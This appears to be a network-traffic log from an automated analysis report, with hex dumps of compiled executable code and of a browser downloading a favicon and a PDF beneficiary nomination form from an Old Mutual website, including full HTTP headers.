                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 50 8d 45 f8 53 50 e8 af 5f 00 00 8b 46 20 83 c4 28 c1 e8 05 5b a8 01 74 13 83 7e 28 00 75 0d ff 76 08 ff 76 34 e8 7f f7 ff ff 59 59 8a 46 31 3c 67 74 04 3c 47 75 17 8b 46 20 c1 e8 05 a8 01 75 0d ff 76 08 ff 76 34 e8 d1 f6 ff ff 59 59 8b 46 34 80 38 2d 75 08 83 4e 20 40 40 89 46 34 8b 56 34 8a 02 3c 69 74 0c 3c 49 74 08 3c 6e 74 04 3c 4e 75 08 83 66 20 f7 c6 46 31 73 8d 7a 01 8a 0a 42 84 c9 75 f9 2b d7 b0 01 5f 89 56 38 5e 8b e5 5d c3 8b ff 56 8b f1 57 ff 76 2c 0f b6 46 31 50 ff 76 04 ff 36 e8 c5 f3 ff ff 83 c4 10 8d 7e 40 84 c0 74 39 83 46 14 04 8b 46 14 53 8b 9f 04 04 00 00 0f b7 40 fc 85 db 75 02 8b df 50 8b cf e8 04 f3 ff ff 50 8d 46 38 53 50 e8 0f 50 00 00 83 c4 10 5b 85 c0 74 25 c6 46 30 01 eb 1f 8b 8f 04 04 00 00 85 c9 75 02 8b cf 83 46 14 04 8b 46
                                                                                                                                              Data Ascii: PESP_F ([t~(uvv4YYF1<gt<GuF uvv4YYF48-uN @@F4V4<it<It<nt<Nuf F1szBu+_V8^]VWv,F1Pv6~@t9FFS@uPPF8SPP[t%F0uFF
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 33 c0 5f 5b 5e 8b e5 5d c3 8b ff 55 8b ec 83 ec 1c a1 14 f0 02 10 33 c5 89 45 fc 8b c1 89 45 e8 57 8b 00 8b 38 85 ff 75 08 83 c8 ff e9 ed 00 00 00 53 8b 1d 14 f0 02 10 8b d3 56 8b 37 83 e2 1f 8b 7f 04 33 f3 8b ca 33 fb d3 ce d3 cf 85 f6 0f 84 c5 00 00 00 83 fe ff 0f 84 bc 00 00 00 6a 20 59 2b ca 89 75 f4 33 c0 89 7d f0 d3 c8 33 c3 89 45 ec 83 ef 04 3b fe 72 68 8b 0f 3b c8 74 f3 33 cb 89 07 89 4d f8 8b ca 8b 5d f8 d3 cb 8b cb ff 15 38 11 02 10 ff d3 8b 45 e8 8b 1d 14 f0 02 10 8b d3 83 e2 1f 8b 00 8b 00 8b 08 8b 40 04 33 cb 89 4d f8 33 c3 8b ca d3 4d f8 d3 c8 8b 4d f8 89 45 e4 3b 4d f4 75 0b 3b 45 f0 8b 45 ec 74 a3 8b 45 e4 89 45 f0 8b f8 8b 45 ec 8b f1 89 4d f4 eb 91 83 fe ff 74 0d 56 e8 13 0d 00 00 8b 1d 14 f0 02 10 59 8b c3 33 d2 83 e0 1f 6a 20 59 2b c8
                                                                                                                                              Data Ascii: 3_[^]U3EEW8uSV733j Y+u3}3E;rh;t3M]8E@3M3MME;Mu;EEtEEEMtVY3j Y+
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 00 00 83 c4 10 c3 68 54 52 02 10 68 4c 52 02 10 68 54 52 02 10 6a 0f e8 34 01 00 00 83 c4 10 c3 68 9c 52 02 10 68 94 52 02 10 68 9c 52 02 10 6a 13 e8 1a 01 00 00 83 c4 10 c3 68 d0 52 02 10 68 c8 52 02 10 68 d0 52 02 10 6a 15 e8 00 01 00 00 83 c4 10 c3 68 b8 52 02 10 68 b0 52 02 10 68 b8 52 02 10 6a 14 e8 e6 00 00 00 83 c4 10 c3 68 ec 52 02 10 68 e4 52 02 10 68 ec 52 02 10 6a 16 e8 cc 00 00 00 83 c4 10 c3 8b ff 55 8b ec 51 53 56 57 8b 7d 08 e9 a1 00 00 00 8b 1f 8d 04 9d e8 0a 03 10 8b 30 89 45 fc 85 f6 74 0b 83 fe ff 0f 84 83 00 00 00 eb 7d 8b 1c 9d 50 4c 02 10 68 00 08 00 00 6a 00 53 ff 15 a8 10 02 10 8b f0 85 f6 75 50 ff 15 04 10 02 10 83 f8 57 75 35 6a 07 68 50 51 02 10 53 e8 dc cc ff ff 83 c4 0c 85 c0 74 21 6a 07 68 60 51 02 10 53 e8 c8 cc ff ff 83 c4
                                                                                                                                              Data Ascii: hTRhLRhTRj4hRhRhRjhRhRhRjhRhRhRjhRhRhRjUQSVW}0Et}PLhjSuPWu5jhPQSt!jh`QS
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 58 c5 66 0f 14 c0 66 0f 59 f0 f2 0f 59 e0 66 0f 59 c0 66 0f 58 fe 66 0f 59 f8 f2 0f 59 c3 66 0f 70 f7 ee f2 0f 59 c7 66 0f 70 eb ee f2 0f 59 f3 f2 0f 59 e3 66 0f 6e f9 66 0f 73 f7 2d 66 0f 6e d2 66 0f 76 c9 66 0f f3 ca f2 0f 58 c5 f2 0f 58 c6 66 0f 54 cb f2 0f 58 c4 66 0f 57 f6 66 0f 76 e4 66 0f f3 e2 f2 0f 5c d9 f2 0f 10 d1 f2 0f 58 c8 66 0f 54 cc 66 0f c4 f7 03 5f f2 0f 5c d1 f2 0f 58 c2 f2 0f 58 c3 83 fe 00 7f 4e 5e f2 0f 59 c7 f2 0f 59 cf f2 0f 58 c1 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 0f 84 10 fe ff ff ba 19 00 00 00 83 f8 00 0f 84 02 fe ff ff 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 5e f2 0f 58 c1 f2 0f 59 c7 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00
                                                                                                                                              Data Ascii: XffYYfYfXfYYfpYfpYYfnfs-fnfvfXXfTXfWfvf\XfTf_\XXN^YYXYXf%=fD$D$^XYYXf%=
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 00 57 8d 45 ec 6a 02 50 e8 89 8e ff ff 83 c4 3c 0b c3 f7 d8 1a c0 5f 5e fe c0 5b 8b e5 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 d0 00 00 00 6a 07 56 e8 31 fd ff ff 8d 46 1c 6a 07 50 e8 26 fd ff ff 8d 46 38 6a 0c 50 e8 1b fd ff ff 8d 46 68 6a 0c 50 e8 10 fd ff ff 8d 86 98 00 00 00 6a 02 50 e8 02 fd ff ff ff b6 a0 00 00 00 e8 8d 4d ff ff ff b6 a4 00 00 00 e8 82 4d ff ff ff b6 a8 00 00 00 e8 77 4d ff ff 8d 86 b4 00 00 00 6a 07 50 e8 d3 fc ff ff 8d 86 d0 00 00 00 6a 07 50 e8 c5 fc ff ff 83 c4 44 8d 86 ec 00 00 00 6a 0c 50 e8 b4 fc ff ff 8d 86 1c 01 00 00 6a 0c 50 e8 a6 fc ff ff 8d 86 4c 01 00 00 6a 02 50 e8 98 fc ff ff ff b6 54 01 00 00 e8 23 4d ff ff ff b6 58 01 00 00 e8 18 4d ff ff ff b6 5c 01 00 00 e8 0d 4d ff ff ff b6 60 01 00 00 e8 02 4d ff ff 83 c4
                                                                                                                                              Data Ascii: WEjP<_^[]UVujV1FjP&F8jPFhjPjPMMwMjPjPDjPjPLjPT#MXM\M`M
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: e9 48 11 fe ff 8d 4d bc e9 b0 1e fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 98 33 c8 e8 9a 6f fe ff 8b 4a fc 33 c8 e8 90 6f fe ff b8 c4 da 02 10 e9 af 82 fe ff cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a fc 33 c8 e8 6f 6f fe ff b8 00 d8 02 10 e9 8e 82 fe ff cc cc cc 8d 4d e8 e9 68 27 fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a e4 33 c8 e8 42 6f fe ff 8b 4a fc 33 c8 e8 38 6f fe ff b8 08 db 02 10 e9 57 82 fe ff cc cc cc cc cc cc cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 0f 6f fe ff b8 44 db 02 10 e9 2e 82 fe ff cc cc cc 8d 4d e0 e9 e6 4c fe ff 6a 18 8b 45 dc 50 e8 fd 6e fe ff 83 c4 08 c3 8d 4d e8 e9 31 46 fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 90 33 c8 e8 cb 6e fe ff 8b 4a f8 33 c8 e8 c1 6e fe ff b8
                                                                                                                                              Data Ascii: HMT$BJ3oJ3oT$BJ3ooMh'T$BJ3BoJ38oWT$BJ3oD.MLjEPnM1FT$BJ3nJ3n
                                                                                                                                              2024-12-19 06:52:29 UTC16384INData Raw: 00 d0 4b 02 10 19 00 00 00 d8 4b 02 10 11 00 00 00 e0 4b 02 10 18 00 00 00 e8 4b 02 10 16 00 00 00 f0 4b 02 10 17 00 00 00 f8 4b 02 10 22 00 00 00 00 4c 02 10 23 00 00 00 04 4c 02 10 24 00 00 00 08 4c 02 10 25 00 00 00 0c 4c 02 10 26 00 00 00 14 4c 02 10 65 78 70 00 70 6f 77 00 6c 6f 67 00 6c 6f 67 31 30 00 00 00 73 69 6e 68 00 00 00 00 63 6f 73 68 00 00 00 00 74 61 6e 68 00 00 00 00 61 73 69 6e 00 00 00 00 61 63 6f 73 00 00 00 00 61 74 61 6e 00 00 00 00 61 74 61 6e 32 00 00 00 73 71 72 74 00 00 00 00 73 69 6e 00 63 6f 73 00 74 61 6e 00 63 65 69 6c 00 00 00 00 66 6c 6f 6f 72 00 00 00 66 61 62 73 00 00 00 00 6d 6f 64 66 00 00 00 00 6c 64 65 78 70 00 00 00 5f 63 61 62 73 00 00 00 5f 68 79 70 6f 74 00 00 66 6d 6f 64 00 00 00 00 66 72 65 78 70 00 00 00 5f 79
                                                                                                                                              Data Ascii: KKKKKK"L#L$L%L&Lexppowloglog10sinhcoshtanhasinacosatanatan2sqrtsincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.2.94971218.161.69.164433988C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-19 06:52:29 UTC710OUTGET /favicon.ico HTTP/1.1
                                                                                                                                              Host: www.oldmutual.co.za
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-12-19 06:52:30 UTC9606INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 8659
                                                                                                                                              Connection: close
                                                                                                                                              Date: Thu, 19 Dec 2024 05:18:11 GMT
                                                                                                                                              Last-Modified: Wed, 18 Dec 2024 15:03:19 GMT
                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: AmazonS3
                                                                                                                                              Content-Security-Policy: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://fonts.googleapis.com https://fonts.gstatic.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://embed.tawk.to https://salesiq.zoho.com https://css.zohostatic.com https://css.zohocdn.com/* https://css.zohocdn.com/salesiq/styles/fonts/cw/puvi/* https://css.zohocdn.com/salesiq/styles/fonts/cw/* https://css.zohocdn.com; style-src 'self' 'unsafe-inline' https://tagmanager.google.com https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://fonts.googleapis.com https://optimize.google [TRUNCATED]
                                                                                                                                              2024-12-19 06:52:31 UTC9823INData Raw: 58 2d 57 65 62 4b 69 74 2d 43 53 50 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 66 6f 6e 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2d 64 6d 73 2e 6f 6c 64 6d 75 74 75 61 6c 2e 63 6f 6d 2e 67 68 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2e 69 6e 74 65 72 70 61 79 61 66 72 69 63 61 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2d 64 6d 73 2e 6f 6c 64 6d 75 74 75 61 6c 2e 63 6f 6d 2e 67 68 2f 2a 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2e 69 6e 74 65 72 70 61 79 61 66 72 69 63 61 2e 63 6f 6d 2f 2a 20 20 68 74 74 70 73 3a 2f 2f 74 61 67 6d 61 6e 61 67 65 72 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                              Data Ascii: X-WebKit-CSP: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://
                                                                                                                                              2024-12-19 06:52:31 UTC8659INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 68 74 6d 6c 2d 73 65 72 76 65 72 2d 72 65 6e 64 65 72 65 64 3d 22 74 72 75 65 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 76 75 65 2d 74 61 67 3d 22 25 37 42 25 32 32 6c 61 6e 67 25 32 32 3a 25 37 42 25 32 32 73 73 72 25 32 32 3a 25 32 32 65 6e 25 32 32 25 37 44 25 37 44 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 72 69 64 73 6f 6d 65 3a 68 61 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 35 63 38 39 66 39 36 37 66 63 38 65 38 62 64 31 32 30 36 64 31 33 64 39 32 31 31 66 64 35 35 37 35 38 62 35 63 36 64 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 76 75 65 2d 74 61 67 3d 22 73 73 72 22 20
                                                                                                                                              Data Ascii: <!DOCTYPE html><html data-html-server-rendered="true" lang="en" data-vue-tag="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D"> <head> <title> </title><meta name="gridsome:hash" content="55c89f967fc8e8bd1206d13d9211fd55758b5c6d"><meta data-vue-tag="ssr"


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.2.94972018.161.69.164433988C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-19 06:52:33 UTC450OUTGET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1
                                                                                                                                              Host: www.oldmutual.co.za
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-12-19 06:52:33 UTC1055INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: application/pdf
                                                                                                                                              Content-Length: 313058
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename=Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                              Fastly-Io-Error: not a supported image format
                                                                                                                                              Fastly-Io-Served-By: vpop-etou8240196
                                                                                                                                              Fastly-Stats: io=1
                                                                                                                                              Server: contentstack
                                                                                                                                              X-Contentstack-Organization: blt2c31cdce6d24f06c
                                                                                                                                              X-Request-Id: 3dd79f5f402ab71f92243ac6017a1eed
                                                                                                                                              X-Runtime: 97ms
                                                                                                                                              Via: 1.1 varnish, 1.1 varnish, 1.1 f86af2517be02da2188623ca97ab57f0.cloudfront.net (CloudFront)
                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Thu, 19 Dec 2024 06:52:28 GMT
                                                                                                                                              X-Served-By: cache-ams21052-AMS, cache-fjr990025-FJR
                                                                                                                                              X-Cache-Hits: 4, 0
                                                                                                                                              X-Timer: S1734591149.900478,VS0,VE1
                                                                                                                                              Access-Control-Expose-Headers: content-disposition, content-type, cache-control, status, content-length
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Strict-Transport-Security: max-age=31557600
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                              X-Amz-Cf-Pop: DXB52-P1
                                                                                                                                              X-Amz-Cf-Id: TSzJykJUzmV5n-VQKtRFYT8W3FFVNI_OIjSwG8Ro3RX5W4-ji8Fz3Q==
                                                                                                                                              Age: 5
                                                                                                                                              2024-12-19 06:52:33 UTC16384INData Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 31 39 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 34 31 38 2f 4c 65 6e 67 74 68 20 33 36 38 31 2f 4e 20 34 36 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de cc 5a 7b 6f 1b 39 92 ff 2a 0d dc 1f 9b e0 30 62 37 9f 4d 60 11 40 b1 9d 19 df c6 76 2e 76 2e 37 d3 10 16 6d a9 6d 37 46 52 6b 5b ad 4c 7c 9f fe 7e 45 16 65 f9 19 27 13 4c 16 86 c4 57 55 b1 aa 58 2f d2 f2 b6 cc f2 cc 5b 9f 49 6d 32 6f 5c e6 a4 45 6b b3 52 62 de 60 ae c0 d8 a9 ac c8 1d 06 ae c8 0a 53 52 47 66 32 2f a8 93 67 52 5a 09 1a 98 31 04 6c 8b 4c 5a 55 a2 e3 d0 d1 0e 1d 9b 49 e7 08 46 a1 53 16 e8 00 ab 54 0a 3b f8 4c e9 02 33 a6 cc 94 75 c4 8b c9 94 93 00 76
                                                                                                                                              Data Ascii: %PDF-1.6%1196 0 obj<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>streamhZ{o9*0b7M`@v.v.7mm7FRk[L|~Ee'LWUX/[Im2o\EkRb`SRGf2/gRZ1lLZUIFST;L3uv
                                                                                                                                              2024-12-19 06:52:33 UTC16384INData Raw: 27 06 fe bc d0 63 0f 61 5d 5e 56 70 d7 b5 de 4e bb 2e 2f 2b 56 fb 86 cb cb 8a ed 9d b3 2e 2f 2b b6 17 ae ba bc ac d8 5e b8 ea d2 b2 62 fb 6d e4 fe 1a 71 50 56 cc 5f 10 7c 5a 56 22 e6 95 f3 0d 15 71 55 7c 14 d4 ba c2 0b e2 69 59 59 27 5e f3 01 7e 1a 4d 63 d7 38 34 ba c6 d0 38 35 a6 c6 d2 28 3c 13 9e 09 cf 84 67 0f 75 22 46 7c a1 6c 55 3f 6d ac 6e 1a bb c6 a1 d1 35 86 c6 a9 31 35 d6 43 09 59 4f 0b 11 9e 1b 75 9f cd cf 16 6f 4b ba 97 74 2f e9 5e d2 bd 4c 2a 98 54 30 a9 60 52 c1 f2 fc d1 b7 25 0f 97 3c 5c f2 70 c9 c3 25 0f 97 3c 5c f2 70 c9 c3 d5 0e 0c bb cd 25 3f 2f f9 79 29 6e 4b 71 5b 8a db 52 dc 96 e2 b6 14 b7 b5 8e d0 55 e5 b3 84 aa de 92 ea 2d a9 de 92 ea 2d a9 de 92 a5 6c 38 15 91 73 e8 ea 0a a9 ae 90 ea 0a a9 ae 90 29 54 f5 a2 54 2f 4a f5 a2 2c 3b 42
                                                                                                                                              Data Ascii: 'ca]^VpN./+V./+^bmqPV_|ZV"qU|iYY'^~Mc8485(<gu"F|lU?mn515CYOuoKt/^L*T0`R%<\p%<\p%?/y)nKq[RU--l8s)TT/J,;B
                                                                                                                                              2024-12-19 06:52:34 UTC16384INData Raw: 64 3a 33 35 38 33 63 35 35 31 2d 36 38 30 37 2d 39 37 34 31 2d 39 63 66 30 2d 36 38 32 64 62 35 31 38 31 35 33 65 3c 2f 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 63 33 36 35 33 35 39 65 2d 35 62 35 66 2d 31 31 64 64 2d 39 31 65 30 2d 62 30 65 61 30 30 65 31 37 65 62 64 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 69 64 3a 32 65 34 64 31 30 61 38 2d 38 31 34 31 2d 34 31 64 35 2d 38 35 38 37 2d 33 62 33 32 39 33 34 62 66 38 66 65 3c 2f 78 6d 70 4d 4d 3a 44 6f 63
                                                                                                                                              Data Ascii: d:3583c551-6807-9741-9cf0-682db518153e</xmpMM:InstanceID> <xmpMM:OriginalDocumentID>adobe:docid:indd:c365359e-5b5f-11dd-91e0-b0ea00e17ebd</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>xmp.id:2e4d10a8-8141-41d5-8587-3b32934bf8fe</xmpMM:Doc
                                                                                                                                              2024-12-19 06:52:34 UTC14808INData Raw: 99 79 52 dd 63 8a 3e cf df 5e f0 78 ee 49 23 b8 9d 4f 35 4e f3 2c f6 47 ef 2d 34 72 50 1f 28 f5 f0 66 0a 6e 2f 12 00 8f 9f ee 30 6e 45 61 20 25 fb cc 74 cb 50 4a 66 fe 1b 15 27 78 1e f4 7e d4 84 c5 12 22 2d c6 e8 e6 23 97 47 8a c5 31 7d 0c ad c2 c6 2b 02 9d 15 ed 20 c3 79 73 13 52 3a 80 16 15 93 0d a0 05 d0 35 13 1e 4d 56 59 c6 62 31 ad 0b 31 54 c4 7e 83 8f 52 44 da df 4b 06 30 03 a6 90 2e 35 8d e1 09 7b 55 11 aa 88 af 2a 49 b5 d5 c9 52 23 8d a0 27 eb 1e 5b 1f c5 15 b6 1e bf 8f 2e 35 33 ff bd a1 58 ee 82 2e 55 ab b0 00 b5 62 15 e2 c0 2e 35 b2 c7 d7 14 e0 16 da bb 3e 8a 62 ea b0 30 8a f8 20 3c 2b d8 ef 29 46 74 bf 65 06 d0 25 50 84 20 4e 56 f0 89 5d b1 23 45 94 f0 9c c0 33 ef b7 ca 87 b6 50 fb 7d 95 3c 08 cc 06 93 e5 3c e8 43 48 d1 fe 0d 95 8c 78 fa 51 7d
                                                                                                                                              Data Ascii: yRc>^xI#O5N,G-4rP(fn/0nEa %tPJf'x~"-#G1}+ ysR:5MVYb11T~RDK0.5{U*IR#'[.53X.Ub.5>b0 <+)Fte%P NV]#E3P}<<CHxQ}
                                                                                                                                              2024-12-19 06:52:34 UTC1576INData Raw: d5 89 4f 7f e7 36 0a d7 00 fe 2d 98 7e 96 46 21 f3 37 c8 3f 28 90 f3 9c 27 e4 0a 57 35 15 13 ac e6 49 20 fa a0 4f 68 e5 d6 ee e6 08 e1 f4 87 9c de 1b e7 1c 83 d7 ca b9 06 ff 00 22 06 31 3e a7 f0 17 21 17 20 dd a6 c9 5c 4f 7f 88 fd 35 e9 ff a4 b7 64 ca 91 86 f4 6b 99 72 64 53 fa bc 21 d7 b6 c4 5e 9a 8c 2e b1 97 26 07 32 ed 31 90 28 83 fe 78 54 a1 b4 e3 0a b8 bb 3b 98 b5 77 5f 9c 6d f4 b2 2a 25 71 88 ce f5 c7 99 10 48 7e 3f 0b b2 60 70 50 1c f0 fa 7c 0c 14 06 11 b1 7d 1e f3 18 49 84 65 46 24 46 13 87 64 26 48 74 88 b2 6b 31 66 ae d8 37 5f 45 1c 91 e8 60 94 59 a3 71 1f 33 05 94 9e 17 e2 3e d1 e7 9d 8b 53 16 8b e1 50 48 f1 52 d6 c2 5b 2d 8a 42 55 5d 3a 39 c4 aa 70 c8 e8 51 56 cf f9 f5 5c f2 5a 2c 4e d1 9b b9 24 65 8e 58 3c 81 23 94 f3 1c bc d5 c4 5b 4d 09 6f
                                                                                                                                              Data Ascii: O6-~F!7?('W5I Oh"1>! \O5dkrdS!^.&21(xT;w_m*%qH~?`pP|}IeF$Fd&Htk1f7_E`Yq3>SPHR[-BU]:9pQV\Z,N$eX<#[Mo
                                                                                                                                              2024-12-19 06:52:34 UTC16384INData Raw: c1 d2 79 4b d9 4f b0 b5 8c fd 94 55 c3 7e ca ba 9b fd 94 b5 9c db 0c c0 b8 87 db 64 a3 96 db 64 23 cc 6d b2 51 c7 3e 41 18 f5 ec c3 c6 0a f6 61 a3 81 7d d8 58 a9 e2 2a 85 75 af 8a 8b ad fb 54 5c 6c ad 52 71 b1 b5 5a c5 c5 d6 1a 15 17 5b f7 ab b8 d8 5a ab e2 62 6b 1d c6 b8 28 36 81 0f a8 54 a4 18 e6 b7 b4 39 1d e6 83 3c e8 2a 35 03 a9 f5 b8 46 8d cf 43 da 64 9f 0d ca 47 18 9f 87 51 78 6a ac d6 47 54 4a 95 78 54 9b 5c 62 a3 36 d9 7d 13 ea 31 0e 8f 69 93 1d 36 6b 93 1d be 0d 5f 7f ac be 2d 2a a5 dc b7 6a 93 dd b7 69 93 dd 1f 47 49 e3 b0 5d 9b ec f0 1d 6d b2 c3 0e f8 4e 8b d5 f7 84 4a 29 f7 ef 6a 93 dd bf a7 4d 76 7f 12 25 8d c3 53 da 64 87 a7 b5 c9 0e 3b bd 4d 7d 1c 32 fa 58 2d cd 8f 24 ad 8c 58 d9 95 9b a2 f7 f0 68 f3 1b d1 45 25 7f 38 fe ea cc da 14 ff 7f
                                                                                                                                              Data Ascii: yKOU~dd#mQ>Aa}X*uT\lRqZ[Zbk(6T9<*5FCdGQxjGTJxT\b6}1i6k_-*jiGI]mNJ)jMv%Sd;M}2X-$XhE%8
                                                                                                                                              2024-12-19 06:52:34 UTC16384INData Raw: 53 4d ab 85 aa b5 95 90 d6 48 6b 57 67 18 88 cd 89 a0 17 22 8c 4e 35 3c 18 96 84 94 e1 41 fa e0 0f 67 cf 7d 7a 69 fd 01 95 d6 f9 83 e3 17 27 3e be cd ee 39 b7 ff 45 79 d5 c6 b4 75 9d e1 73 8e bf 80 7c e0 6b 63 0c d8 98 8f 6b 63 08 21 10 8c b1 1d 3e 7c 8d 0d 26 e0 05 1c 0c e1 a3 c1 59 13 06 c9 92 54 2d a3 cd 07 4d 1a 93 90 8f 69 93 9a 46 53 33 75 99 54 75 3f a6 6c 53 34 2d 9a b4 a5 da a4 6e da 8f 49 9d a6 49 5b 9b f6 c7 b4 8f ac d3 a6 4d d3 b4 a9 4d c6 65 cf 39 f7 62 20 59 36 2d 04 0b df 7b ee 39 ef fb bc cf fb bc cf 9d 99 f9 ea 24 6a f6 bd 8e a3 f1 f8 67 3b d4 16 0d 07 7e f6 61 9c bd 85 34 28 75 88 c5 00 f2 cd 20 6d 71 6a fb 20 31 1a 4d 07 89 c9 14 32 a5 24 fe cf 6a 2e ac 68 b4 d7 38 f2 3f 63 8c aa 97 68 46 fd 06 bd bc f2 77 76 6f e1 9b 0b 77 16 d6 f6 8d
                                                                                                                                              Data Ascii: SMHkWg"N5<Ag}zi'>9Eyus|kckc!>|&YT-MiFS3uTu?lS4-nII[MMe9b Y6-{9$jg;~a4(u mqj 1M2$j.h8?chFwvow
